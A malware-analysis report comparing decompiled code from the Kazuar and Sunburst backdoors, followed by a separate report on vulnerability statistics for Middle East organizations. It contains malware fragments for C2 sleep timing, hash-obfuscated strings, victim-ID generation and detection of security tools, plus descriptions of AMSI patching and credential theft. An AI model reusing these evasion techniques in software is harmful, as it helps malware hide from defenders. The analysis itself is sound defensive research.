Throughout the years, Kazuar has been under constant development. Its developers have been regularly improving it, switching from one obfuscator to another, changing algorithms and updating features. We looked at all versions of Kazuar since 2015, in order to better understand its development timeline.

Kazuar development and evolution timeline

In the following sections, we look at some of the similarities between Kazuar and Sunburst. First, we will discuss how a particular feature is used in Kazuar, and then we will describe the implementation of the same feature in Sunburst.

Comparison of the sleeping algorithms

Both Kazuar and Sunburst have implemented a delay between connections to a C2 server, likely designed to make the network activity less obvious.

Kazuar

Kazuar calculates the time it sleeps between two C2 server connections as follows: it takes two timestamps, the minimal sleeping time and the maximal sleeping time, and calculates the waiting period with the following formula:

generated_sleeping_time = sleeping_timemin + x (sleeping_timemax - sleeping_timemin)

where x is a random floating-point number ranging from 0 to 1 obtained by calling the NextDouble method, while sleeping_timemin and sleeping_timemax are time periods obtained from the C2 configuration which can be changed with the help of a backdoor command. As a result of the calculations, the generated time will fall in the [sleeping_timemin, sleeping_timemax] range. By default, sleeping_timemin equals two weeks and sleeping_timemax equals four weeks in most samples of Kazuar we analysed. After calculating the sleeping time, it invokes the Sleep method in a loop.

Kazuar implements this algorithm in the following lines of code (class names were omitted from the code for clarity):

long random_multiplication(Random random_0, long long_0) { return (long)(random_0.NextDouble() * (double)long_0); } TimeSpan get_randomized_sleeping_time(Random random_0, TimeSpan timeSpan_0, TimeSpan timeSpan_1) { if (timeSpan_0 > timeSpan_1) { TimeSpan timeSpan = timeSpan_0; timeSpan_0 = timeSpan_1; timeSpan_1 = timeSpan; } long num = random_multiplication(random_0, timeSpan_1.Ticks - timeSpan_0.Ticks); // randomize the sleeping time return new TimeSpan(timeSpan_0.Ticks + num); } TimeSpan get_remaining_time(TimeSpan timeSpan_0, TimeSpan timeSpan_1) { if (!(timeSpan_0 > timeSpan_1)) { return timeSpan_0; } return timeSpan_1; } void wait_between_connections() { for (;;) { // the sleeping loop TimeSpan[] array = get_min_and_max_sleep_time(); /* the previous line retrieves sleeping_time_min and sleeping_time_max from the configuration */ TimeSpan timeSpan = get_randomized_sleeping_time(this.random_number, array[0], array[1]); DateTime last_c2_connection = get_last_c2_connection(); TimeSpan timeSpan2 = DateTime.Now - last_c2_connection; if (timeSpan2 >= timeSpan) { break; /* enough time has passed, the backdoor may connect to the C2 server */ } TimeSpan timeout = get_remaining_time(timeSpan - timeSpan2, this.timespan); // this.timespan equals 1 minute Thread.Sleep(timeout); } }

Sunburst

Sunburst uses exactly the same formula to calculate sleeping time, relying on NextDouble to generate a random number. It then calls the sleeping function in a loop. The only difference is that the code is somewhat less complex. Below we compare an extract of the sleeping algorithm found in Kazuar and the code discovered in Sunburst.

Kazuar Sunburst The listed code is used in multiple versions of the backdoor, including samples with MD5 150D0ADDF65B6524EB92B9762DB6F074 (2016) and 1F70BEF5D79EFBDAC63C9935AA353955 (2019+).
The random waiting time generation algorithm and the sleeping loop. MD5 2C4A910A1299CDAE2A4E55988A2F102E.
The random waiting time generation algorithm and the sleeping loop. long random_multiplication(Random random_0, long long_0) { return (long)(random_0.NextDouble() * (double)long_0); } TimeSpan get_randomized_sleeping_time(Random random_0, TimeSpan timeSpan_0, TimeSpan timeSpan_1) { if (timeSpan_0 > timeSpan_1) { TimeSpan timeSpan = timeSpan_0; timeSpan_0 = timeSpan_1; timeSpan_1 = timeSpan; } long num = random_multiplication(random_0, timeSpan_1.Ticks - timeSpan_0.Ticks); return new TimeSpan(timeSpan_0.Ticks + num); } void wait_between_connections() { for (;;) { ... if (timeSpan2 >= timeSpan) { break; } TimeSpan timeout = get_remaining_time(timeSpan - timeSpan2, this.timespan); Thread.Sleep(timeout); } } private static void DelayMs(double minMs, double maxMs) { if ((int)maxMs == 0) { minMs = 1000.0; maxMs = 2000.0; } double num; for (num = minMs + new Random().NextDouble() * (maxMs - minMs); num >= 2147483647.0; num -= 2147483647.0) { Thread.Sleep(int.MaxValue); } Thread.Sleep((int)num); }

Comparing the two code fragments outlined above, we see that the algorithms are similar.
It’s noteworthy that both Kazuar and Sunburst wait for quite a long time before or in-between C2 connections. By default, Kazuar chooses a random sleeping time between two and four weeks, while Sunburst waits from 12 to 14 days. Sunburst, like Kazuar, implements a command which allows the operators to change the waiting time between two C2 connections.

Based on the analysis of the sleeping algorithm, we conclude:

  • Kazuar and Sunburst use the same mathematical formula, relying on Random().NextDouble() to calculate the waiting time
  • Kazuar randomly selects a sleeping period between two and four weeks between C2 connections
  • Sunburst randomly selects a sleeping period between twelve and fourteen days before contacting its C2
  • Such long sleep periods in C2 connections are not very common for typical APT malware
  • While Kazuar does a Thread.Sleep using a TimeSpan object, Sunburst uses an Int32 value; due to the fact that Int32.MaxValue is limited to roughly 24 days of sleep, the developers “emulate” longer sleeps in a loop to get past this limitation
  • In case of both Kazuar and Sunburst, the sleeping time between two connections can be changed with the help of a command sent by the C2 server
The FNV-1a hashing algorithm

Sunburst uses the FNV-1a hashing algorithm extensively throughout its code. This detail initially attracted our attention and we tried to look for other malware that uses the same algorithm. It should be pointed out that the usage of this hashing algorithm is not unique to Kazuar and Sunburst. However, it provides an interesting starting point for finding more similarities. FNV-1a has been widely used by the Kazuar .NET Backdoor since its early versions. We compare the usage of FNV-1a in Kazuar and Sunburst below.

Kazuar

The shellcode used in Kazuar finds addresses of library functions with a variation of the FNV-1a hashing algorithm. The way of finding these addresses is traditional: the shellcode traverses the export address table of a DLL, fetches the name of an API function, hashes it and then compares the hash with a given value.

A variation of the FNV-1a hashing algorithm in Kazuar shellcode present in 2015-autumn 2020 samples, using a 0x1000197 modified constant instead of the default FNV_32_PRIME 0x1000193 (MD5 150D0ADDF65B6524EB92B9762DB6F074)

This customized FNV-1a 32-bit hashing algorithm has been present in the Kazuar shellcode since 2015. For the Kazuar binaries used in 2020, a modified 64-bit FNV-1a appeared in the code:

Kazuar MD5 804785B5ED71AADF9878E7FC4BA4295C (Dec 2020).
Implementation of a modified FNV-1a algorithm (64-bit version). public static ulong bu(string pK) { byte[] bytes = Encoding.UTF8.GetBytes(pK); ulong num = 0xCBF29CE484222325UL; ulong num2 = 0x69294589840FB0E8UL; ulong num3 = 0x100000001B3UL; for (int i = 0; i < bytes.Length; i++) { num ^= (ulong)bytes[i]; num *= num3; } return num ^ num2; }

We observed that the 64-bit FNV-1a hash present in the 2020 Kazuar sample is also not standard. When the loop with the XOR and multiplication operations finishes execution, the resulting value is XOR-ed with a constant (XOR 0x69294589840FB0E8UL). In the original implementation of the FNV-1a hash, no XOR operation is applied after the loop.

Sunburst

Sunburst uses a modified, 64-bit FNV-1a hash for the purpose of string obfuscation. For example, when started, Sunburst first takes the FNV-1a hash of its process name (solarwinds.businesslayerhost) and checks if it is equal to a hardcoded value (0xEFF8D627F39A2A9DUL). If the hashes do not coincide, the backdoor code will not be executed:

public static void Initialize() { try { if (OrionImprovementBusinessLayer.GetHash(Process.GetCurrentProcess().ProcessName.ToLower()) == 0xEFF8D627F39A2A9DUL) //"solarwinds.businesslayerhost" { // backdoor execution code } } }

Hashes are also used to detect security tools running on the system. During its execution Sunburst iterates through the list of processes (Process.GetProcesses()), services (from “SYSTEM\\CurrentControlSet\\services“) and drivers (WMI, “Select * From Win32_SystemDriver“), hashes their names and looks them up in arrays containing the corresponding hardcoded hashes:

private static bool SearchAssemblies(Process[] processes) { for (int i = 0; i < processes.Length; i++) { ulong hash = OrionImprovementBusinessLayer.GetHash(processes[i].ProcessName.ToLower()); if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1) { return true; } } return false; }

Below we compare the modified FNV-1a implementations of the two algorithms in Kazuar and Sunburst.

String obfuscation comparison Kazuar Sunburst Code adapted from MD5 804785B5ED71AADF9878E7FC4BA4295C (Dec 2020). Implementation of a modified 64-bit FNV-1a algorithm (deobfuscated, with constant folding applied). MD5 2C4A910A1299CDAE2A4E55988A2F102E.
Implementation of the modified 64-bit FNV-1a algorithm. public static ulong bu(string pK) { byte[] bytes = Encoding.UTF8.GetBytes(pK); ulong num = 0xCBF29CE484222325UL; ulong num2 = 0x69294589840FB0E8UL; ulong num3 = 0x100000001B3UL; for (int i = 0; i < bytes.Length; i++) { num ^= (ulong)bytes[i]; num *= num3; } return num ^ num2; } private static ulong GetHash(string s) { ulong num = 0xCBF29CE484222325UL; try { foreach (byte b in Encoding.UTF8.GetBytes(s)) { num ^= (ulong)b; num *= 0x100000001B3UL; } } catch { } return num ^ 0x5BAC903BA7D81967UL; }

It should be noted that both Kazuar and Sunburst use a modified 64-bit FNV-1a hash, which adds an extra step after the loop, XOR’ing the final result with a 64-bit constant.

Some readers might assume that the FNV-1a hashing was inserted by the compiler because C# compilers can optimize switch statements with strings into a series of if statements. In this compiler optimized code, the 32-bit FNV-1a algorithm is used to calculate hashes of strings:

Clean executable Sunburst Optimized switch statement. MD5 2C4A910A1299CDAE2A4E55988A2F102E.
Switch statement. string key = keyValuePair.Key; uint num = <PrivateImplementationDetails>.ComputeStringHash(key); // computes 32-bit FNV-1a if (num <= 0x848C8620U) { if (num <= 0x3A79338FU) { if (num <= 0x150EFE0DU) { if (num != 0x11DE6CDCU) { if (num != 0x13F0FB79U) { if (num == 0x150EFE0DU) { // direct string compare: if (key == "divisibleBy") { // case handling code } ... ulong hash = OrionImprovementBusinessLayer.GetHash(text3.ToLower()); if (hash <= 0x7B2647ACD648B3BFUL) { if (hash <= 0x54E145F4CDA21B52UL) { if (hash != 0x25F3EA85AE88826EUL) { if (hash == 0x54E145F4CDA21B52UL) { // direct string compare missing // case handling code } ...

In the case of Sunburst, the hashes in the switch statement do not appear to be compiler-generated. In fact, the C# compiler uses 32-bit, not 64-bit hashing. The hashing algorithm added by the compiler also does not have an additional XOR operation in the end. The compiler inserts the hashing method in the class, while in Sunburst the same code is implemented within the OrionImprovementBusinessLayer class. The compiler-emitted FNV-1a method will have the ComputeStringHash name. In case of Sunburst, the name of the method is GetHash. Additionally, the compiler inserts a check which compares the hashed string with a hardcoded value in order to eliminate the possibility of a collision. In Sunburst, there are no such string comparisons, which suggests these hash checks are not a compiler optimization.

To conclude the findings, we summarize them as follows:

  • Both Sunburst and Kazuar use FNV-1a hashing throughout their code
  • A modified 32-bit FNV-1a hashing algorithm has been used by the Kazuar shellcode since 2015 to resolve APIs
  • This Kazuar shellcode uses a modified FNV-1a hash where its FNV_32_PRIME is 0x1000197 (instead of the default FNV_32_PRIME 0x1000193)
  • A modified 64-bit version of the FNV-1a hashing algorithm was implemented in Kazuar versions found in 2020
  • The modified 64-bit FNV-1a hashing algorithms implemented in Kazuar (November and December 2020 variants) have one extra step: after the hash is calculated, it is XORed with a hardcoded constant (0x69294589840FB0E8UL)
  • Sunburst also uses a modified 64-bit FNV-1a hashing algorithm, with one extra step: after the hash is calculated, it is XORed with a hardcoded constant (0x5BAC903BA7D81967UL)
  • The 64-bit constant used in the last step of the hashing is different between Kazuar and Sunburst
  • The aforementioned hashing algorithm is used to conceal plain strings in Sunburst
The algorithm used to generate victim identifiers

Another similarity between Kazuar and Sunburst can be found in the algorithm used to generate the unique victim identifiers, described below.

Kazuar

In order to generate unique strings (across different victims), such as client identifiers, mutexes or file names, Kazuar uses an algorithm which accepts a string as input. To derive a unique string from the given one, the backdoor gets the MD5 hash of the string and then XORs it with a four-byte unique “seed” from the machine. The seed is obtained by fetching the serial number of the volume where the operating system is installed.

Sunburst

An MD5+XOR algorithm can also be found in Sunburst. However, instead of the volume serial number, it uses a different set of information as the machine’s unique seed, hashes it with MD5 then it XORs the two hash halves together. The two implementations are compared in the following table:

Kazuar Sunburst The listed code is used in multiple versions of the backdoor, including MD5 150D0ADDF65B6524EB92B9762DB6F074 (2016) and 1F70BEF5D79EFBDAC63C9935AA353955 (2019+).
The MD5+XOR algorithm. MD5 2C4A910A1299CDAE2A4E55988A2F102E. Part of a function with the MD5+XOR algorithm. public static Guid md5_plus_xor(string string_0) { byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier); byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0)); for (int i = 0; i < array.Length; i++) { byte[] array2 = array; int num = i; array2[num] ^= bytes[i % bytes.Length]; } return new Guid(array); } private static bool GetOrCreateUserID(out byte[] hash64) { string text = OrionImprovementBusinessLayer.ReadDeviceInfo(); hash64 = new byte[8]; Array.Clear(hash64, 0, hash64.Length); if (text == null) { return false; } <part of the code omitted for clarity> using (MD5 md = MD5.Create()) { byte[] bytes = Encoding.ASCII.GetBytes(text); byte[] array = md.ComputeHash(bytes); if (array.Length < hash64.Length) { return false; } for (int i = 0; i < array.Length; i++) { byte[] array2 = hash64; int num = i % hash64.Length; array2[num] ^= array[i]; } } return true; }

To summarize these findings:

  • To calculate unique victim UIDs, both Kazuar and Sunburst use a hashing algorithm which is different from their otherwise “favourite” FNV-1a; a combination of MD5+XOR:
    • Kazuar XORs a full 128-bit MD5 of a pre-defined string with a four-byte key which contains the volume serial number
    • Sunburst computes an MD5 from a larger set of data, which concatenates the first adapter MAC address (retrieved using NetworkInterface.GetAllNetworkInterfaces()), the computer domain (GetIPGlobalProperties().DomainName) and machine GUID (“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography” -> “MachineGuid”) , then it XORs together the two halves into an eight-bytes result
  • This MD5+XOR algorithm is present in all Kazuar samples used before November 2020 (a massive code change, almost a complete redesign, was applied to Kazuar in November 2020)
False flags possibility

The possibility of a false flag is particularly interesting and deserves additional attention. In the past, we have seen sophisticated attacks such as OlympicDestroyer confusing the industry and complicating attribution. Subtle mistakes, such as the raw re-use of the Rich header from the Lazarus samples from the Bangladesh bank heist, allowed us to demonstrate that they were indeed false flags and allowed us to eventually connect OlympicDestroyer with Hades, a sophisticated APT group.

Supposing that Kazuar false flags were deliberately introduced into Sunburst, there are two main explanations of how this may have happened:

  1. The use of XOR operation after the main FNV-1a computation was introduced in the 2020 Kazuar variants after it had appeared in the Sunburst code. In this case, the possibility of a false flag is less likely as the authors of Sunburst couldn’t have predicted the Kazuar’s developers’ actions with such high precision.
  2. A sample of Kazuar was released before Sunburst was written, containing the modified 64-bit hash function, and went unnoticed by everyone except the Sunburst developers. In this case, the Sunburst developers must have been aware of new Kazuar variants. Obviously, tracing all modifications of unknown code is quite a difficult and tedious task for the following reasons:
    • Kazuar’s developers are constantly changing their code as well as the packing methods, thus making it harder to detect the backdoor with YARA rules;
    • Kazuar samples (especially the new ones) quite rarely appear on VirusTotal.

The second argument comes with a caveat; the earliest Sunburst sample with the modified algorithm we have seen was compiled in February 2020, while the new Kazuar was compiled in or around November 2020. In the spring and summer of 2020, “old” samples of Kazuar were actively used, without the 64-bit modified FNV-1a hash. This means that option 1 (the extra XOR was introduced in the 2020 Kazuar variants after it had appeared in Sunburst) is more likely.

November 2020 – a new Kazuar

In November 2020, some significant changes happened to Kazuar. On November 18, our products detected a previously unknown Kazuar sample (MD5 9A2750B3E1A22A5B614F6189EC2D67FA). In this sample, the code was refactored, and the malware became much stealthier as most of its code no longer resembled that of the older versions. Here are the most important changes in Kazuar’s code:

  • The infamous “Kazuar’s {0} started in process {1} [{2}] as user {3}/{4}.” string was removed from the binary and replaced with a much subtler “Agent started inside {0}.” message, meaning that the backdoor is no longer called Kazuar in the logs. Despite that, the GUID, which was present in Kazuar since 2015 and serves as the backdoor’s unique identifier, still appears in the refactored version of Kazuar.
  • Depending on the configuration, the malware may now protect itself from being detected by the Anti-Malware Scan Interface by patching the first bytes of the AmsiScanBuffer API function.
  • New spying features have been added to the backdoor. Now Kazuar is equipped with a keylogger and a password stealer which can fetch browser history data, cookies, proxy server credentials and, most importantly, passwords from Internet browsers, Filezilla, Outlook, Git and WinSCP. It also gets vault credentials. The stealer is implemented in the form of a C2 server command.
  • Commands have been completely revamped. The system information retrieval function now also hunts for UAC settings and installed hot patches and drivers. The webcam shot-taking command has been completely removed from the backdoor. Commands which allow the execution of WMI commands and the running of arbitrary PowerShell, VBS and JS scripts have been introduced into Kazuar. The malware can now also gather forensic data (“forensic” is a name of a command present in the refactored version of Kazuar). Kazuar collects information about executables that run at startup, recently launched executables and compatibility assistant settings. Furthermore, a command to collect saved credentials from files left from unattended installation and IIS has been introduced into the backdoor.
  • The data is now exfiltrated to the C2 server using ZIP archives instead of TAR.
  • A class that implements parsing of different file formats has been added into Kazuar. It is currently not used anywhere in the code. This class can throw exceptions with the “Fucking poltergeist” text. In earlier versions of Kazuar, a “Shellcode fucking poltergeist error” message was logged if there was a problem with shellcode.
  • The MD5+XOR algorithm is not as widely used as before in the latest version of Kazuar. The backdoor generates most of unique strings and identifiers with an algorithm which is based on the already discussed FNV-1a hash and Base62. The MD5+XOR algorithm itself has been modified. Its new implementation is given below:
    Kazuar (2020). The modified MD5+XOR algorithm. public static string ZK(string X, string JK = null) { if (YU.fG(JK)) { JK = oR.d6; } string str = X.ToLower(); string s = "pipename-" + str + "-" + JK; byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] array = MD5.Create().ComputeHash(bytes); byte b = 42; byte b2 = 17; byte b3 = 21; for (int i = 0; i < array.Length; i++) { b = (b * b2 & byte.MaxValue); b = (b + b3 & byte.MaxValue); byte[] array2 = array; int num = i; array2[num] ^= b; } Guid guid = new Guid(array); return guid.ToString("B").ToUpper(); }
  • The random sleeping interval generation algorithm mentioned in the main part of the report also appears to be missing from the updated backdoor sample. In order to generate a random sleeping period, the malware now uses a more orthodox random number generation algorithm:
    Kazuar (2020). The new random number generation algorithm. Methods were renamed for clarity. public static long generate_random_number_in_range(long wG, long NG) { if (wG > NG) { utility_class.swap<long>(ref wG, ref NG); } return Math.Abs(utility_class.get_random_int64()) % (NG - wG + 1L) + wG; }

The newest sample of Kazuar (MD5 024C46493F876FA9005047866BA3ECBD) was detected by our products on December 29. It also contained refactored code.

For now, it’s unclear why the Kazuar developers implemented these massive code changes in November. Some possibilities include:

  • It’s a normal evolution of the codebase, where new features are constantly added while older ones are moved
  • The Kazuar developers wanted to avoid detection by various antivirus products or EDR solutions
  • Suspecting the SolarWinds attack might be discovered, the Kazuar code was changed to resemble the Sunburst backdoor as little as possible
Conclusions

These code overlaps between Kazuar and Sunburst are interesting and represent the first potential identified link to a previously known malware family.

Although the usage of the sleeping algorithm may be too wide, the custom implementation of the FNV-1a hashes and the reuse of the MD5+XOR algorithm in Sunburst are definitely important clues. We should also point out that although similar, the UID calculation subroutine and the FNV-1a hash usage, as well the sleep loop, are still not 100% identical.

Possible explanations for these similarities include:

  • Sunburst was developed by the same group as Kazuar
  • The Sunburst developers adopted some ideas or code from Kazuar, without having a direct connection (they used Kazuar as an inspiration point)
  • Both groups, DarkHalo/UNC2452 and the group using Kazuar, obtained their malware from the same source
  • Some of the Kazuar developers moved to another team, taking knowledge and tools with them
  • The Sunburst developers introduced these subtle links as a form of false flag, in order to shift blame to another group

At the moment, we do not know which one of these options is true. While Kazuar and Sunburst may be related, the nature of this relation is still not clear. Through further analysis, it is possible that evidence confirming one or several of these points might arise. At the same time, it is also possible that the Sunburst developers were really good at their opsec and didn’t make any mistakes, with this link being an elaborate false flag. In any case, this overlap doesn’t change much for the defenders. Supply chain attacks are some of the most sophisticated types of attacks nowadays and have been successfully used in the past by APT groups such as Winnti/Barium/APT41 and various cybercriminal groups.

To limit exposure to supply chain attacks, we recommend the following:

  • Isolate network management software in separate VLANs, monitor them separately from the user networks
  • Limit outgoing internet connections from servers or appliances that run third party software
  • Implement regular memory dumping and analysis; checking for malicious code running in a decrypted state using a code similarity solution such as Kaspersky Threat Attribution Engine (KTAE)

More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

FAQ
  1. TLDR; just tell us who’s behind the SolarWinds supply chain attack?
    Honestly, we don’t know. What we found so far is a couple of code similarities between Sunburst and a malware discovered in 2017, called Kazuar. This malware was first observed around 2015 and is still being used in the wild. The most advanced Kazuar sample we found is from December 2020. During five years of Kazuar evolution, we observed a continuous development, in which significant features, which bear resemblance to Sunburst, were added. While these similarities between Kazuar and Sunburst are notable, there could be a lot of reasons for their existence, including:
    • Sunburst was developed by the same group as Kazuar
    • The Sunburst developers used some ideas or code from Kazuar, without having a direct connection (they used Kazuar code as “inspiration”)
    • Both groups, that is, the DarkHalo/UNC2452 and the group using Kazuar obtained their malware from the same source
    • One of the Kazuar developers moved to another team, taking his knowledge and tools with them
    • The Sunburst developers introduced these subtle links as a form of a false flag, in order to shift the blame to another group

    At the moment, we simply do not know which of these options is true. Through further analysis, it is possible that evidence enforcing one or several of these points might arise. To clarify – we are NOT saying that DarkHalo / UNC2452, the group using Sunburst, and Kazuar or Turla are the same.

  2. What are these similarities? Could these similarities be just coincidences?
    In principle, none of these algorithms or implementations are unique. In particular, the things that attracted our attention were the obfuscation of strings through modified FNV-1a algorithms, where the hash result is XOR’ed with a 64-bit constant, the implementation of the C2 connection delay, using a large (and unusual) value (Kazuar uses a random sleeping time between two and four weeks, while Sunburst waits from 12 to 14 days) and the calculation of the victim UID through an MD5 + XOR algorithm. It should be pointed that none of these code fragments are 100% identical. Nevertheless, they are curious coincidences, to say at least. One coincidence wouldn’t be that unusual, two coincidences would definitively raise an eyebrow, while three such coincidences are kind of suspicious to us.
  3. What is this Kazuar malware?
    Kazuar is a fully featured .NET backdoor, and was first reported by our colleagues from Palo Alto Networks in 2017. The researchers surmised at the time that it may have been used by the Turla APT group, in order to replace their Carbon platform and other Turla second stage backdoors. Our own observations confirm that Kazuar was used, together with other Turla tools, during multiple breaches in the past few years, and is still in use. Also, Epic Turla resolves imports with another customized version of the FNV-1a hash and has code similarities with Kazuar’s shellcode.
  4. So Sunburst is connected to Turla?
    Not necessarily, refer to question 1 for all possible explanations.
  5. The media claims APT29 is responsible for the SolarWinds hack. Are you saying that’s wrong?
    We do not know who is behind the SolarWinds hack – we believe attribution is a question better left for law enforcement and judicial institutions. To clarify, our research has identified a number of shared code features between the Sunburst malware and Kazuar.
    Our research has placed APT29 as another potential name for “The Dukes”, which appears to be an umbrella group comprising multiple actors and malware families. We initially reported MiniDuke, the earliest malware in this umbrella, in 2013. In 2014, we reported other malware used by “The Dukes”, named CosmicDuke. In CosmicDuke, the debug path strings from the malware seemed to indicate several build environments or groups of “users” of the “Bot Gen Studio”: “NITRO” and “Nemesis Gemina”. In short, we suspect CosmicDuke was being leveraged by up to three different entities, raising the possibility it was shared across groups. One of the interesting observations from our 2014 research was the usage of a webshell by one of the “Bot Gen Studio” / “CosmicDuke” entities that we have seen before in use by Turla. This could suggest that Turla is possibly just one of the several users of the tools under the “Dukes” umbrella.
  6. How is this connected to Cozy Duke?
    In 2015, we published futher research on CozyDuke, which seemed to focus on what appeared to be government organizations and commercial entities in the US, Germany and other countries. In 2014, their targets, as reported in the media, included the White House and the US Department of State. At the time, the media also called it “the worst ever” hack. At the moment, we do not see any direct links between the 2015 CozyDuke and the SolarWinds attack.
  7. How solid are the links with Kazuar?
    Several code fragments from Sunburst and various generations of Kazuar are quite similar. We should point out that, although similar, these code blocks, such as the UID calculation subroutine and the FNV-1a hashing algorithm usage, as well the sleep loop, are still not 100% identical. Together with certain development choices, these suggest that a kind of a similar thought process went into the development of Kazuar and Sunburst. The Kazuar malware continued to evolve and later 2020 variants are even more similar, in some respect, to the Sunburst branch. Yet, we should emphasise again, they are definitely not identical.
  8. So, are you saying Sunburst is essentially a modified Kazuar?
    We are not saying Sunburst is Kazuar, or that it is the work of the Turla APT group. We spotted some interesting similarities between these two malware families and felt the world should know about them. We love to do our part, contributing our findings to the community discussions; others can check these similarities on their own, draw their own conclusions and find more links. What is the most important thing here is to publish interesting findings and encourage others to do more research. We will, of course, continue with our own research too.
  9. Is this the worst cyberattack in history?
    Attacks should always be judged from the victim’s point of view. It should also account for physical damage, if any, loss of human lives and so on. For now, it would appear the purpose of this attack was cyberespionage, that is, extraction of sensitive information. By comparison, other infamous attacks, such as NotPetya or WannaCry had a significantly destructive side, with victim losses in the billions of dollars. Yet, for some out there, this may be more devastating than NotPetya or WannaCry; for others, it pales in comparison.
  10. How did we get here?
    During the past years, we’ve observed what can be considered a “cyber arms race”. Pretty much all nation states have rushed, since the early 2000s, to develop offensive military capabilities in cyberspace, with little attention to defense. The difference is immediately notable when it comes to the budgets available for the purchase of offensive cyber capabilities vs the development of defensive capabilities. The world needs more balance to the (cyber-)force. Without that, the existing cyber conflicts will continue to escalate, to the detriment of the normal internet user.
  11. Is it possible this is a false flag?
    In theory, anything is possible; and we have seen examples of sophisticated false flag attacks, such as the OlympicDestroyer attack. For a full list of possible explanations refer to question 1.
  12. So. Now what?
    We believe it’s important that other researchers around the world also investigate these similarities and attempt to discover more facts about Kazuar and the origin of Sunburst, the malware used in the SolarWinds breach. If we consider past experience, for instance looking back to the WannaCry attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to link them together with high confidence. Further research on this topic can be crucial to connecting the dots.
Indicators of Compromise

File hashes:

E220EAE9F853193AFE77567EA05294C8 (First detected Kazuar sample, compiled in 2015) 150D0ADDF65B6524EB92B9762DB6F074 (Kazuar sample compiled in 2016) 54700C4CA2854858A572290BCD5501D4 (Kazuar sample compiled in 2017) 053DDB3B6E38F9BDBC5FB51FDD44D3AC (Kazuar sample compiled in 2018) 1F70BEF5D79EFBDAC63C9935AA353955 (Kazuar sample compiled in 2019) 9A2750B3E1A22A5B614F6189EC2D67FA (Kazuar sample used in November 2020) 804785B5ED71AADF9878E7FC4BA4295C (Kazuar sample used in December 2020) 024C46493F876FA9005047866BA3ECBD (Most recent Kazuar sample) 2C4A910A1299CDAE2A4E55988A2F102E (Sunburst sample)

More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

2020. december 29.

Digital Footprint Intelligence Report

Introduction

The Digital Footprint Intelligence Service announces the results of research on the digital footprints of governmental, financial and industrial organizations for countries in the Middle East region: Bahrain, Egypt, Iran, Iraq, Jordan, Kuwait, Lebanon, Oman, Qatar, Saudi Arabia, Sudan, Syria, Turkey, UAE, Yemen. The data presented in this report was collected through Kaspersky’s own threat research and analysis mechanism and various other open sources during Q3 2020. The exceptions are Iran, Iraq, Sudan, Syria and Yemen for which only open source data was used. Official entities can request the more detailed results of subsequent research and analysis via dfi@kaspersky.com.

The service is designed to provide customers with an analysis of their footprint in open networks and an overview of the opportunities presented to adversaries. Assessing a company’s assets from the perspective of an attacker and their possible intentions and potential opportunities were among the key considerations for cyberthreat intelligence analysts when compiling this report.

Sources of intelligence

Scope of report

There are many organizations that belong to the three key verticals – governmental, financial and industrial – across the Middle East region, but this report focuses on critical organizations with vulnerabilities.


Distribution of vulnerable IP addresses by percentage


Share of vulnerabilities by country in the Middle East region

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Statistics of detected vulnerabilities on services (download)

What’s behind the statistics Vulnerable networks Data leaks Dark web Lack of security updates

Bad network service configuration

Management interfaces available publicly Corporate accounts in databases of leaked passwords Leaked financial data

Access to compromised infrastructure for sale Methodological materials

Depending on the complexity of the exploitation and the damage cause, the detected vulnerabilities are divided into five levels:

  • Critical – Vulnerabilities that, if exploited, can compromise an infrastructure resource in one step;
  • High – Vulnerabilities that, if exploited, will give access to infrastructure in two or more steps. Additional data (e.g. credentials) to penetrate the infrastructure may be required;
  • Medium – Vulnerabilities that allow an attacker to obtain useful information about a resource that can be used to obtain restricted access: e.g. management interfaces of various services, directory listing, protocols used to unencrypt data transfer, etc.;
  • Low – Vulnerabilities that allow an attacker to collect information about a resource, such as logins used in the system, access as anonymous user to various services, etc.;
  • Information – Vulnerabilities related to security flaws, such as default and start pages of web services, printer services and various software that can be used to perform DDoS attacks, routing protocols, etc.
Importance of vulnerability based on industry vertical

The governmental sector leads the way in critical-level vulnerabilities, whereas the standard cybercriminal target – the financial industry – has mostly low-level vulnerabilities.

Industrial companies fall in the middle of this spectrum, though their share of medium-level vulnerabilities still deserves attention. Most of these vulnerabilities lead to the disclosure of information about a resource that can be used to obtain restricted access.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of vulnerabilities across various verticals (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of vulnerable companies across various verticals (download)

Which companies have critical vulnerabilities?

  • 30% of industrial companies have critical-level vulnerabilities;
  • Every third industrial company is prone to critical-level vulnerabilities;
  • Every second industrial and government organization has high-level vulnerabilities;
  • 7% of all banking organizations in the Middle East have critical vulnerabilities.
Vulnerabilities that can be exploited by adversaries

Security issues in various verticals:

  • 2% of governmental organizations in the scope of the research have Microsoft Windows 2000 in their environments;
  • Large share of misconfigured services in industrial companies indicates a low level of information security maturity;
  • Among the resources in the industrial sector, both old vulnerabilities (e.g. HEARTBLEED) and the latest vulnerabilities (e.g. vulnerabilities in Citrix network equipment) were found.

